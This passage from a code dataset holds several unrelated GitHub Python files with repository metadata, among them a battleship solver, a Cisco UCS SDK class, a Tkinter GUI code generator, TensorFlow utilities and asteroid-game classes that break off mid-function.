self.__fields:\n            ret += '|'\n\n            for field in row:\n                ret += '{}|'.format(field)\n\n            ret += \"\\n\"\n            ret += divider()\n\n        return ret\n\nclass Solver(object):\n    def __init__(self, table):\n        self.table = table\n\n    def mark_edges(self):\n        for row in range(0, self.table.height):\n            for col in range(0, self.table.width):\n                if self.table.is_ship(row, col):\n                    print(\"MARK!\")\n                    self.table.mark(row - 1, col - 1, FieldType.water)\n                    self.table.mark(row - 1, col + 1, FieldType.water)\n                    self.table.mark(row + 1, col - 1, FieldType.water)\n                    self.table.mark(row + 1, col + 1, FieldType.water)\n\n    def show(self):\n        print(str(self.table))\n\ncolorama.init()\n\nt = Table(6, 6)\nt.add_ship(1, 3, 1, False)\nt.add_ship(2, 5, 2, False)\nt.add_ship(3, 1, 3, False)\nt.add_ship(5, 1, 1, False)\nt.add_ship(5, 3, 2, True)\nt.add_ship(6, 5, 1, False)\nt.reveal(1, 2)\nt.reveal(3, 3)\nt.reveal(5, 1)\nt.reveal(5, 2)\n\ns = 
Solver(t)\ns.show()\ns.mark_edges()\ns.show()\n","repo_name":"gergelypolonkai/battleship","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":6594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74697547894","text":"#!/usr/bin/env python\n\n''' Description:\tScript that takes a merged-counts.txt file (produced from calling \n get-bam-counts.sh on .bam files) and \n \t\t 1) sums all values in each row\n \t\t 2) To also sort by sum from lowest to largest sum value, see usage\n Usage:\n \t\t 1) /PATH/TO/sum_mergedcounts.py merged_counts.txt\n \t\t 2) /PATH/TO/xec_merge-sum-sort.sh merged_counts.txt\n Output: \n \t\t 1) mc_with-sums.txt \n \t\t 2) mc_with-sums.txt, mc_sum-sort.txt \n \n CYP 07/19/2017\n'''\n\nimport sys\n\nout = open(\"./mc_with-sum.txt\", 'w')\nfirst = True\n\n# key: sum, value: line\nsum_dict = {}\nwith open(sys.argv[1],'r') as f:\n for line in f:\n # skip first line, contains contig names\n if first:\n first = False\n out.write(line)\n else:\n summed = 0\n line = line.strip()\n # vals per line are tab-delimited, separate and store in list\n items = line.split('\\t')\n\n # sum each tab-delimited value in line list (not-including \n # gene name)\n for val in items[1:]:\n summed += int(val)\n\n # write full line to output file with the sum of the values\n # appended to the end of the line\n out.write(line + '\\t' + str(summed) + '\\n')\n\nout.close()\n\n","repo_name":"cypayne/palumbi_scripts","sub_path":"sum_mergedcounts.py","file_name":"sum_mergedcounts.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"43059976340","text":"\"\"\"This module contains the general information for MgmtController ManagedObject.\"\"\"\n\nfrom ...ucscmo import ManagedObject\nfrom ...ucsccoremeta import UcscVersion, MoPropertyMeta, MoMeta\nfrom ...ucscmeta import VersionMeta\n\n\nclass MgmtControllerConsts():\n SUBJECT_ADAPTOR = \"adaptor\"\n SUBJECT_BLADE = \"blade\"\n SUBJECT_BOARD_CONTROLLER = \"board-controller\"\n SUBJECT_CHASSIS = \"chassis\"\n SUBJECT_CMC = \"cmc\"\n SUBJECT_IOCARD = \"iocard\"\n SUBJECT_LOCAL_DISK = \"local-disk\"\n SUBJECT_SAS_EXPANDER = \"sas-expander\"\n SUBJECT_SERVER_UNIT = \"server-unit\"\n SUBJECT_SWITCH = \"switch\"\n SUBJECT_SYSTEM = \"system\"\n SUBJECT_UNKNOWN = \"unknown\"\n\n\nclass MgmtController(ManagedObject):\n \"\"\"This is MgmtController class.\"\"\"\n\n consts = MgmtControllerConsts()\n naming_props = set([])\n\n mo_meta = MoMeta(\"MgmtController\", \"mgmtController\", \"mgmt\", VersionMeta.Version101a, \"InputOutput\", 0x1f, [], [\"admin\", \"ls-compute\", \"ls-config\", \"ls-network\", \"ls-server\"], [u'adaptorUnit', u'computeBlade', u'computeBoardController', u'computeRackUnit', u'computeServerUnit', u'computeSystem', u'equipmentChassis', u'equipmentIOCard', u'equipmentSharedIOModule', u'equipmentSwitchIOCard', u'equipmentSystemIOController', u'networkElement', u'storageController', u'storageSasExpander', u'topSystem'], [u'cimcvmediaActualMountList', u'firmwareRunning', u'mgmtCmcSecureBoot', u'mgmtConnection', u'mgmtIf', u'mgmtInterface', u'vnicIpV4PooledAddr', u'vnicIpV4ProfDerivedAddr', u'vnicIpV4StaticAddr'], [\"Get\"])\n\n prop_meta = {\n \"child_action\": MoPropertyMeta(\"child_action\", \"childAction\", \"string\", VersionMeta.Version111a, MoPropertyMeta.INTERNAL, None, None, None, 
r\"\"\"((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}\"\"\", [], []), \n \"dn\": MoPropertyMeta(\"dn\", \"dn\", \"string\", VersionMeta.Version101a, MoPropertyMeta.READ_ONLY, 0x2, 0, 256, None, [], []), \n \"guid\": MoPropertyMeta(\"guid\", \"guid\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n \"model\": MoPropertyMeta(\"model\", \"model\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n \"oper_conn\": MoPropertyMeta(\"oper_conn\", \"operConn\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 256, None, [], []), \n \"revision\": MoPropertyMeta(\"revision\", \"revision\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n \"rn\": MoPropertyMeta(\"rn\", \"rn\", \"string\", VersionMeta.Version101a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []), \n \"serial\": MoPropertyMeta(\"serial\", \"serial\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n \"status\": MoPropertyMeta(\"status\", \"status\", \"string\", VersionMeta.Version101a, MoPropertyMeta.READ_WRITE, 0x8, None, None, r\"\"\"((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}\"\"\", [], []), \n \"subject\": MoPropertyMeta(\"subject\", \"subject\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, [\"adaptor\", \"blade\", \"board-controller\", \"chassis\", \"cmc\", \"iocard\", \"local-disk\", \"sas-expander\", \"server-unit\", \"switch\", \"system\", \"unknown\"], []), \n \"supported_capability\": MoPropertyMeta(\"supported_capability\", \"supportedCapability\", \"string\", VersionMeta.Version201b, MoPropertyMeta.READ_ONLY, None, None, None, r\"\"\"((defaultValue|none|modify-maintenance-mode|factory-reset|local-storage|usb-nic),){0,5}(defaultValue|none|modify-maintenance-mode|factory-reset|local-storage|usb-nic){0,1}\"\"\", [], []), \n \"vendor\": MoPropertyMeta(\"vendor\", \"vendor\", \"string\", VersionMeta.Version111a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []), \n }\n\n prop_map = {\n \"childAction\": \"child_action\", \n \"dn\": \"dn\", \n \"guid\": \"guid\", \n \"model\": \"model\", \n \"operConn\": \"oper_conn\", \n \"revision\": \"revision\", \n \"rn\": \"rn\", \n \"serial\": \"serial\", \n \"status\": \"status\", \n \"subject\": \"subject\", \n \"supportedCapability\": \"supported_capability\", \n \"vendor\": \"vendor\", \n }\n\n def __init__(self, parent_mo_or_dn, **kwargs):\n self._dirty_mask = 0\n self.child_action = None\n self.guid = None\n self.model = None\n self.oper_conn = None\n self.revision = None\n self.serial = None\n self.status = None\n self.subject = None\n self.supported_capability = None\n self.vendor = None\n\n ManagedObject.__init__(self, \"MgmtController\", parent_mo_or_dn, **kwargs)\n\n","repo_name":"CiscoUcs/ucscsdk","sub_path":"ucscsdk/mometa/mgmt/MgmtController.py","file_name":"MgmtController.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"22"} +{"seq_id":"35498273449","text":"import numpy as np\nimport lenstronomy.Util.util as util\nfrom lenstronomy.Data.pixel_grid import PixelGrid\n\n__all__ = [\"KinBin\"]\n\n\nclass KinBin(object):\n \"\"\"Class that summarizes the binned kinematic data.\n\n The KinBin() class is initialized with :\n - The information about the bins (bin values, 
and bin covariances, which pixels belong to which bin):\n    bin_data, bin_cov, bin_mask.\n    - The information about the associated initial shape of the unbinned kinematic map (bin_mask gives the index of\n    the corresponding bin for each pixel), and ra_at_xy_0, dec_at_xy_0, transform_pix2angle, ra_shift, dec_shift are\n    the usual PixelGrid characteristics.\n    \"\"\"\n\n    def __init__(\n        self,\n        bin_data,\n        bin_cov,\n        bin_mask,\n        ra_at_xy_0,\n        dec_at_xy_0,\n        transform_pix2angle,\n        psf_class,\n        ra_shift=0,\n        dec_shift=0,\n    ):\n        \"\"\"\n        :param bin_data: list, kinematic value of each bin, ordered by bin index.\n        :param bin_cov: 2D array (nbins x nbins), vrms covariance matrix associated to each bin, ordered by bin index\n        :param bin_mask: 2D array, mapping from the unbinned image to the binned one, each pixel value is the\n            corresponding bin index.\n        :param ra_at_xy_0: float, ra coordinate at pixel (0,0) (unbinned image)\n        :param dec_at_xy_0: float, dec coordinate at pixel (0,0) (unbinned image)\n        :param transform_pix2angle: 2x2 array, mapping of pixel (unbinned image) to coordinate\n        :param psf_class: PSF class\n        :param ra_shift: float, RA shift of pixel grid\n        :param dec_shift: float, DEC shift of pixel grid\n\n        \"\"\"\n        self.PSF = psf_class\n        nx, ny = np.shape(bin_mask)\n        self._nx = nx\n        self._ny = ny\n        self.PixelGrid = PixelGrid(\n            nx, ny, transform_pix2angle, ra_at_xy_0 + ra_shift, dec_at_xy_0 + dec_shift\n        )\n\n        self.data = bin_data\n        self.covariance = bin_cov\n        self.bin_mask = bin_mask\n        self._pix2a = transform_pix2angle\n        self._ra_at_xy_0 = ra_at_xy_0\n        self._dec_at_xy_0 = dec_at_xy_0\n\n    @staticmethod\n    def binned_image(data, bin_mask):\n        \"\"\"Creates the binned image of the data.\n\n        :param data: data value in each bin\n        :param bin_mask: mask indicating which pixels belong to which bin\n        \"\"\"\n        binned_image = np.zeros_like(bin_mask)\n        for idx, value in enumerate(data):\n            binned_image[bin_mask == idx] = value\n        return binned_image\n\n    def kin_bin2kwargs(self):\n        \"\"\"Creates the kwargs needed for the 2D kinematic likelihood.\"\"\"\n        kwargs = {\n            \"image\": self.binned_image(self.data, self.bin_mask),\n            \"deltaPix\": self.PixelGrid.pixel_width,\n            \"transform_pix2angle\": self._pix2a,\n            \"ra_at_xy0\": self._ra_at_xy_0,\n            \"dec_at_xy0\": self._dec_at_xy_0,\n        }\n        return kwargs\n\n    def kin_grid(self):\n        \"\"\"Creates a pixel grid that satisfies the kinematics coordinate system.\"\"\"\n        x_grid, y_grid = self.PixelGrid.pixel_coordinates\n        return x_grid, y_grid\n","repo_name":"lenstronomy/lenstronomy","sub_path":"lenstronomy/Data/kinematic_bin_2D.py","file_name":"kinematic_bin_2D.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"22"}
{"seq_id":"875775639","text":"target = [i for i in range(10)]\nlength = 4\nanswer = []\n\n# def dfs(idx, list):\n#     if len(list) == length:\n#         answer.append(list)\n#         return\n\n#     for i in range(idx, len(target)):\n#         print(f'i+1, list+[l[i]]: {i+1, list+[target[i]]}')\n#         dfs(i+1, list+[target[i]])\n\n# dfs(0, [])\n# print(answer)\n\ndef combination_dfs(idx, temp_list):\n    if len(temp_list) == length:\n        answer.append(temp_list)\n        return\n\n    # For combinations with repetition, recurse with i instead of i + 1\n    for i in range(idx, len(target)):\n        print(f'Start with idx : {idx}')\n        print(f'From list {temp_list} > {temp_list + [target[i]]}')\n        combination_dfs(i, temp_list+[target[i]])\n\ncombination_dfs(0, [])\nprint(answer)\n
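\n# Cross-check (added illustration, standard library only): the DFS above\n# enumerates combinations with repetition in lexicographic order, so it\n# must agree with itertools.\nfrom itertools import combinations_with_replacement\nassert answer == [list(c) for c in combinations_with_replacement(target, length)]\n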
","repo_name":"Hoonst/algorithm","sub_path":"Samsung_Special/skillset/combination.py","file_name":"combination.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"47042682659","text":"#coding:utf-8\r\nfrom Tkinter import *\r\nfrom myComponent import *\r\nfrom tkMessageBox import *\r\nimport os\r\n\r\nclass TKIDLE: # TKIDLE class, holds the main program\r\n    def __init__(self,root,m):\r\n        self.root = root\r\n        self.m = m\r\n        \r\n        self.w = 600 # window width\r\n        self.h = 400 # window height\r\n        \r\n        self.createMenuAfter()\r\n        \r\n    def setRootTl(self): # dialog window for setting the interface width and height\r\n        self.roottl = Toplevel()\r\n        tl = self.roottl\r\n        Label(tl,text='width =').grid()\r\n        Label(tl,text='height =').grid()\r\n        self.wstr = StringVar()\r\n        Entry(tl,textvariable = self.wstr).grid(row=0,column=1)\r\n        self.wstr.set('600')\r\n        self.hstr = StringVar()\r\n        Entry(tl,textvariable = self.hstr).grid(row=1,column=1)\r\n        self.hstr.set('400')\r\n        self.frameBtn = Button(tl,text='确定',command = self.setRoot)  # button label: OK\r\n        self.frameBtn.grid(row=2,column=1)\r\n        self.frameBtn.focus_set()\r\n        tl.mainloop()\r\n        \r\n    def setRoot(self): # apply the interface width and height\r\n        if (self.wstr.get() != '') and (self.hstr.get() != ''):\r\n            self.w = eval(self.wstr.get())\r\n            self.h = eval(self.hstr.get())\r\n            self.root.geometry(str(self.w)+'x'+str(self.h))\r\n        \r\n    def createMenuAfter(self): # build the menus\r\n        self.commenu = Menu(self.m) # component menu: add widgets and set the window size\r\n        self.m.add_cascade(label = 'Component', menu = self.commenu)\r\n        self.commenu.add_command(label = 'set width&height', command = self.setRootTl)\r\n        self.commenu.add_command(label = 'add Button', command = self.addButton)\r\n        self.commenu.add_command(label = 'add Label', command = self.addLabel)\r\n        self.commenu.add_command(label = 'add Text', command = self.addText)\r\n        self.commenu.add_command(label = 'add Entry', command = self.addEntry)\r\n        self.commenu.add_command(label = 'add Checkbutton', command = self.addCheckbutton)\r\n        self.commenu.add_command(label = 'add Radiobutton', command = self.addRadiobutton)\r\n        self.allComponent = []\r\n        \r\n        self.outmenu = Menu(self.m) # menu for exporting the generated .py file\r\n        self.m.add_cascade(label = 'Output', menu = self.outmenu)\r\n        self.outmenu.add_command(label = 'Output GUIofProject.py', command = self.outputPy)\r\n        \r\n    def addButton(self): # add a Button: create a myButton instance\r\n        btn = myButton(self.root,len(self.allComponent))\r\n        self.allComponent.append(btn)\r\n        \r\n    def addText(self): # add a Text: create a myText instance\r\n        txt = myText(self.root,len(self.allComponent))\r\n        self.allComponent.append(txt)\r\n        \r\n    def addEntry(self): # add an Entry: create a myEntry instance\r\n        entry = myEntry(self.root,len(self.allComponent))\r\n        self.allComponent.append(entry)\r\n        \r\n    def addLabel(self): # add a Label: create a myLabel instance\r\n        lbl = myLabel(self.root,len(self.allComponent))\r\n        self.allComponent.append(lbl)\r\n        \r\n    def addCheckbutton(self): # add a Checkbutton: create a myCheckbutton instance\r\n        cbt = myCheckbutton(self.root,len(self.allComponent))\r\n        self.allComponent.append(cbt)\r\n        \r\n    def addRadiobutton(self): # add a Radiobutton: create a myRadiobutton instance\r\n        rbt = myRadiobutton(self.root,len(self.allComponent))\r\n        self.allComponent.append(rbt)\r\n        \r\n    def outputPy(self): # write the generated .py file\r\n        # create a project folder under the current directory, then create or\r\n        # open a GUIofProject.py file inside it\r\n        path = os.getcwd() \r\n        path = path + '\\\\project'\r\n        if not os.path.exists(path):\r\n            os.makedirs(path)\r\n        self.GUIpy = open(path+'\\\\'+'GUIofProject.py','w')\r\n        GUIpy = self.GUIpy\r\n        \r\n        # write the header of the .py file\r\n        GUIpy.write('#coding:utf-8\\n')\r\n        
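# (Added note) These sequential write() calls could be collapsed into one\r\n        # triple-quoted template string; they are kept line-by-line here so\r\n        # each emitted source line stays easy to trace.\r\n        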
GUIpy.write('from Tkinter import *\\n')\r\n        GUIpy.write('\\nclass GUIofProject:\\n')\r\n        GUIpy.write('    def __init__(self):\\n')\r\n        GUIpy.write('        self.root = Tk()\\n')\r\n        GUIpy.write('        self.root.title(\\'GUIofProject\\')\\n')\r\n        GUIpy.write('        self.root.geometry(\\''+str(self.w)+'x'+str(self.h)+'\\')\\n\\n')\r\n        \r\n        # first create the variable objects shared by all Radiobuttons\r\n        self.allvariable = {}\r\n        for cpnt in self.allComponent:\r\n            variable = cpnt.radioVariable()\r\n            if variable != -1:\r\n                if not variable in self.allvariable.keys():\r\n                    self.allvariable[variable] = 1\r\n                    GUIpy.write('        self.' + variable + ' = IntVar()\\n')\r\n        \r\n        GUIpy.write('\\n')\r\n        \r\n        # emit the code for each widget by calling its outputComponent method\r\n        for cpnt in self.allComponent:\r\n            cpnt.outputComponent(self.GUIpy)\r\n            \r\n            variable = cpnt.radioVariable() # if the widget is a Radiobutton, emit the code tying it to its variable\r\n            if variable != -1:\r\n                GUIpy.write('        self.' + cpnt.property['name'] + '.config(variable = self.' + cpnt.property['variable'] + ',value = ' + str(self.allvariable[variable]) + ')\\n')\r\n                self.allvariable[variable] = self.allvariable[variable] + 1\r\n        \r\n        GUIpy.write('\\n')\r\n        \r\n        GUIpy.write('        self.root.mainloop()\\n')\r\n        \r\n        # emit the stub functions invoked by each button\r\n        self.allCommand = []\r\n        for cpnt in self.allComponent:\r\n            command = cpnt.outputCommand()\r\n            if command != -1:\r\n                if not command in self.allCommand:\r\n                    self.allCommand.append(command)\r\n                    GUIpy.write('\\n')\r\n                    GUIpy.write('    def ' + command + '(self):\\n')\r\n                    GUIpy.write('        1#在此输入' + cpnt.property['name'] + '按钮功能\\n')  # generated placeholder comment: enter this button's functionality here\r\n\r\n        GUIpy.write('\\n\\na = GUIofProject()')\r\n        \r\n        GUIpy.close()\r\n        \r\n        showinfo('Output','输出成功,请查看本目录下project文件夹,并尽快拷贝以免后续输出覆盖')  # message: export succeeded; check the project folder in this directory and copy it promptly so later exports do not overwrite it","repo_name":"liguanyu/TKIDLE","sub_path":"TKIDLE.py","file_name":"TKIDLE.py","file_ext":"py","file_size_in_byte":6429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}
{"seq_id":"39168388225","text":"import tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nimport os\n\ndef variable_summaries(var):\n    mean = tf.reduce_mean(var)\n    tf.summary.scalar('mean', mean)\n    stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n    tf.summary.scalar('stddev', stddev)\n    tf.summary.scalar('max', tf.reduce_max(var))\n    tf.summary.scalar('min', tf.reduce_min(var))\n    tf.summary.histogram('histogram', var)\n\ndef makepaths(conf):\n    if conf.phase == 'train':\n        conf.ckpt_path = os.path.join(conf.ckpt_path, \"quality=%d\"%(conf.quality))\n        if not os.path.exists(conf.ckpt_path):\n            os.makedirs(conf.ckpt_path)\n\n        conf.param_path = os.path.join(conf.param_path, \"quality=%d\"%(conf.quality))\n        if not os.path.exists(conf.param_path):\n            os.makedirs(conf.param_path)\n\n        conf.summary_path = os.path.join(conf.summary_path, \"quality=%d\"%(conf.quality))\n        if tf.gfile.Exists(conf.summary_path):\n            tf.gfile.DeleteRecursively(conf.summary_path)\n        tf.gfile.MakeDirs(conf.summary_path)\n    \n    else:\n        conf.image_path = os.path.join(conf.image_path, \"quality=%d\"%(conf.quality))\n        if not os.path.exists(conf.image_path):\n            os.makedirs(conf.image_path)\n\n    return conf\n\ndef save_img(arr, path):\n    arr = arr * 255\n    arr = arr.reshape(arr.shape[0], arr.shape[1])\n    \n    for i in range(arr.shape[0]):\n        for j in range(arr.shape[1]):\n            if arr[i][j] > 255.0:\n                arr[i][j] = 255.0\n            if arr[i][j] < 0.0:\n                arr[i][j] = 0.0\n    \n    img = Image.fromarray(arr.astype(np.uint8))\n    
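# (Added note) The clamping loop above is equivalent to the vectorized\n    # arr = np.clip(arr, 0.0, 255.0), which avoids the per-pixel Python loops.\n    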
img.save(path)","repo_name":"tonitick/AR-CNN","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"22"}
{"seq_id":"74637552055","text":"#!/usr/bin/python\nimport results\nno_of_digits = 3\nmaxdigitvalue = (10**no_of_digits) - 1\nmindigitvalue = 10**(no_of_digits - 1)\nmaxvalue = maxdigitvalue**2\n\ndef problem4():\n    # Largest palindrome that is a product of two n-digit numbers: scan the\n    # factor pairs from the top and keep the best palindromic product (simply\n    # scanning palindromes below maxvalue would miss the product constraint).\n    best = 0\n    for a in range(maxdigitvalue, mindigitvalue - 1, -1):\n        for b in range(a, mindigitvalue - 1, -1):\n            product = a * b\n            if product <= best:\n                break\n            strnumber = str(product)\n            if strnumber == strnumber[::-1]:\n                best = product\n    return best\n\nif __name__ == \"__main__\":\n    problem_result = problem4()\n    if problem_result == results.result[4]:\n        print(\"Problem successful. Output: {}\".format(problem_result))\n    else:\n        print(\"Failed. Output: {}\".format(problem_result))","repo_name":"manasks/Project_Euler","sub_path":"problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"24980023583","text":"#!/usr/bin/python3\ndef remove_char_at(str, n):\n    strcopy = \"\"\n    if n > len(str) or n < 0:\n        strcopy = str\n        return(strcopy)\n    for i in range(n):\n        strcopy = strcopy + str[i]\n    for i in range(n + 1, len(str)):\n        strcopy = strcopy + str[i]\n    return(strcopy)\n","repo_name":"kmerchan/holbertonschool-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/101-remove_char_at.py","file_name":"101-remove_char_at.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}
{"seq_id":"27546800141","text":"\n\nclass Encoder:\n    def __init__(self, encoding = {}):\n        self.encoding = encoding\n\n    def updateEncoding(self,string1,string2):\n        list1 = str.split(string1)\n        list2 = str.split(string2)\n        self.encoding = {}\n        for i in range(len(list1)):\n            self.encoding[list1[i]] = list2[i]\n\n    def encode(self, string):\n        encodedstring = \"\"\n        toencode = str.split(string)\n        for i in range(len(toencode)):\n            encodedstring += self.encoding[toencode[i]] + \" \"\n        return encodedstring\n\n    def decode(self, string):\n        decodedic = {}\n        for key in self.encoding:\n            decodedic[self.encoding[key]] = key\n        decodedstring = \"\"\n        todecode = str.split(string)\n        for i in range(len(todecode)):\n            decodedstring += decodedic[todecode[i]] + \" \"\n        return decodedstring\n\n\n\n##################################\n\"\"\"\n29.5:\n\nNo, it does not hold when, for example, the dictionary maps different\nkeys to the same meaning.\n\nE.g. a dict built from the strings:\n\"haus baum welt\"\n\"rot blau blau\"\n\nand the string to be translated is:\n\"baum welt haus\"\n\nthen the final result is: \"welt welt haus\"\n\n\"\"\"\n
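\n# (Added demonstration of the claim above, reusing the example words; not\n# part of the original exercise. Assumes Python 3.7+ dict insertion order,\n# under which the later key wins when building the decoding dictionary.)\nenc2 = Encoder()\nenc2.updateEncoding(\"haus baum welt\", \"rot blau blau\")\nassert enc2.decode(enc2.encode(\"baum welt haus\")).split() == [\"welt\", \"welt\", \"haus\"]\n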
\n\n\n\n#####################################\n# source footer:\n\nfrom random import randint\ntry:\n    # Create an Encoder object\n    enc = Encoder()\n    # Create two strings\n    st1 = \"Lorem ipsum dolor sit amet consetetur sadipscing elitr sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat voluptua\"\n    st2 = \"At vero eos at accusam sit justo duo dolores et ea rebum Stet clita kasd gubergren no sea takimata sanctus est Lorem ipsum\"\n    # set the dictionary\n    enc.updateEncoding(st1,st2)\n    # create a random sentence from words of the first sentence\n    bagOfWords = str.split(st1)\n    st3 = \"\"\n    for i in range(19):\n        st3 += bagOfWords[randint(0,len(bagOfWords)-1)]+\" \"\n    st3 += bagOfWords[1]\n    # encode the random sentence\n    st4 = enc.encode(st3)\n    # decode it\n    st5 = enc.decode(st4)\n    # print the random sentence\n    print(\"#Encode String:\",st3)\n    # print the encoded sentence\n    print(\"#Decode String:\",st4)\n    # print the decoded sentence\n    print(\"#Result:\",st5)\n    # in this case: if the random and the decoded sentence are equal, the test is passed\n    if(str.split(st3) == str.split(st5)):\n        print(\"correct\")\n    else:\n        print(\"Encoding or Decoding incorrect\")\n        print(\"Line #Encode String: and Line #Result: should be equal\")\nexcept:\n    print(\"Some names or functions do not work correctly or are wrongly named\")\n","repo_name":"B0mM3L6000/EiP","sub_path":"Uebung10/Aufgabe29.py","file_name":"Aufgabe29.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}
{"seq_id":"34585053336","text":"from multi_rake import Rake\nimport sys\n\nrake = Rake()\n\ntext = sys.argv[1]\n\nkeywords = rake.apply(text)\n\nkeywords_filtered = [word for word, match in keywords]\n\nfor x in keywords_filtered[:10]:\n    print(x)\n","repo_name":"Waguramu/scio-backend","sub_path":"annotation/multiRake/multi_rake_controller.py","file_name":"multi_rake_controller.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"5151511809","text":"\"\"\"\nAsteroid Classes\nAll the classes to be used by asteroids.py\nAuthor Yurii Vasiuk\n\"\"\"\nimport math\nimport random\nimport arcade\nfrom abc import ABC\nfrom abc import abstractmethod\n\n\n# Global constants to use throughout the game\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\nBULLET_RADIUS = 30\nBULLET_SPEED = 10\nBULLET_LIFE = 60\n\nSHIP_TURN_AMOUNT = 3\nSHIP_THRUST_AMOUNT = 0.25\nSHIP_REAR_THRUST_AMOUNT = 0.1\nSHIP_RADIUS = 30\n\nINITIAL_ROCK_COUNT = 5\n\nBIG_ROCK_SPIN = 1\nBIG_ROCK_SPEED = 1.5\nBIG_ROCK_RADIUS = 15\n\nMEDIUM_ROCK_SPIN = -2\nMEDIUM_ROCK_RADIUS = 5\n\nSMALL_ROCK_SPIN = 5\nSMALL_ROCK_RADIUS = 2\n\n\"\"\"\nThe next two classes will only be used as parts of other classes\nhas_a relationship\n\"\"\"\nclass Point:\n    \"\"\"\n    1 Point\n    \"\"\"\n    def __init__(self, x = 0.0, y = 0.0):\n        self.x = x\n        self.y = y\n\nclass Velocity:\n    \"\"\"\n    2 Velocity\n    \"\"\"\n    def __init__(self, dx = 0, dy = 0):\n        self.dx = dx\n        self.dy = dy\n\nclass FlyingObject(ABC):\n    \"\"\"\n    This is the basic abstract class\n    it will branch out into Ship, Bullet, and Asteroid \n    \"\"\"\n    def __init__(self):\n        self.center = Point()\n        self.velocity = Velocity()\n        self.alive = True\n        self.radius = 0.0\n        self.angle = 
0.0\n\n # these two methods are used the same way by all flying objects\n # inheritance\n def wrap(self, screen_width, screen_height):\n \"\"\"\n return the leaving screen object on the other side of the screen\n :param screen_width: \n :param screen_height: \n :return: \n \"\"\"\n if self.center.x > screen_width + 30:\n self.center.x = 0 - 30\n if self.center.x < 0 - 30:\n self.center.x = screen_width + 30\n if self.center.y > screen_height + 30:\n self.center.y = 0 - 30\n if self.center.y < 0 - 30:\n self.center.y = screen_height + 30\n\n def advance(self):\n \"\"\"\n Move the object with every new frame for the distance of dx and dy\n :return: \n \"\"\"\n self.center.x += self.velocity.dx\n self.center.y += self.velocity.dy\n\n # abstract methods (have to be defined in every child class)\n @abstractmethod\n def draw(self):\n pass\n\n def hit(self):\n \"\"\"\n This method is the same for all FOs\n assign alive to False and use it for removing the dead object in the \"asteroids.py\"\n :return: \n \"\"\"\n self.alive = False\n\nclass Ship(FlyingObject):\n \"\"\"\n Properties and methods of the ship\n \"\"\"\n def __init__(self):\n super().__init__()\n self.center.x = SCREEN_WIDTH / 2\n self.center.y = SCREEN_HEIGHT / 2\n self.radius = SHIP_RADIUS\n self.alive = True\n\n def draw(self):\n \"\"\"\n draw the ship\n :return: \n \"\"\"\n img = \"images/playerShip1_orange.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n \"\"\"\n This block of methods handles moving the ship (turns, calculate the change of velocity\n for moving forward and slowing down; \n for advancing the ship the parent class method \"advance()\" is called in \"asteroids.py\")\n \"\"\"\n def turn_left(self):\n \"\"\"\n # 1 (3 degrees at a time, with the wrap angle logic)\n :return: \n \"\"\"\n if self.angle >= 360:\n self.angle = 0\n self.angle += 3\n\n def turn_right(self):\n \"\"\"\n # 2 (3 degrees at a time, with the wrap angle logic)\n :return: \n \"\"\"\n if self.angle <= 0:\n self.angle = 360\n self.angle -= 3\n\n def thrust(self):\n \"\"\"\n # 3 recalculate the ship's velocity (acceleration)\n :return: \n \"\"\"\n # the logic for getting the right angle and recalculating the velocity\n # depends on what quarter-sphere the \"self.angle\" is in\n # upper left quarter-sphere\n if self.angle >= 0 and self.angle <= 90:\n thrust_angle = 90 - self.angle\n self.velocity.dx -= math.cos(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n self.velocity.dy += math.sin(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n\n # lower left quarter-sphere\n if self.angle > 90 and self.angle < 180:\n thrust_angle = self.angle - 90\n self.velocity.dx -= math.cos(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n self.velocity.dy -= 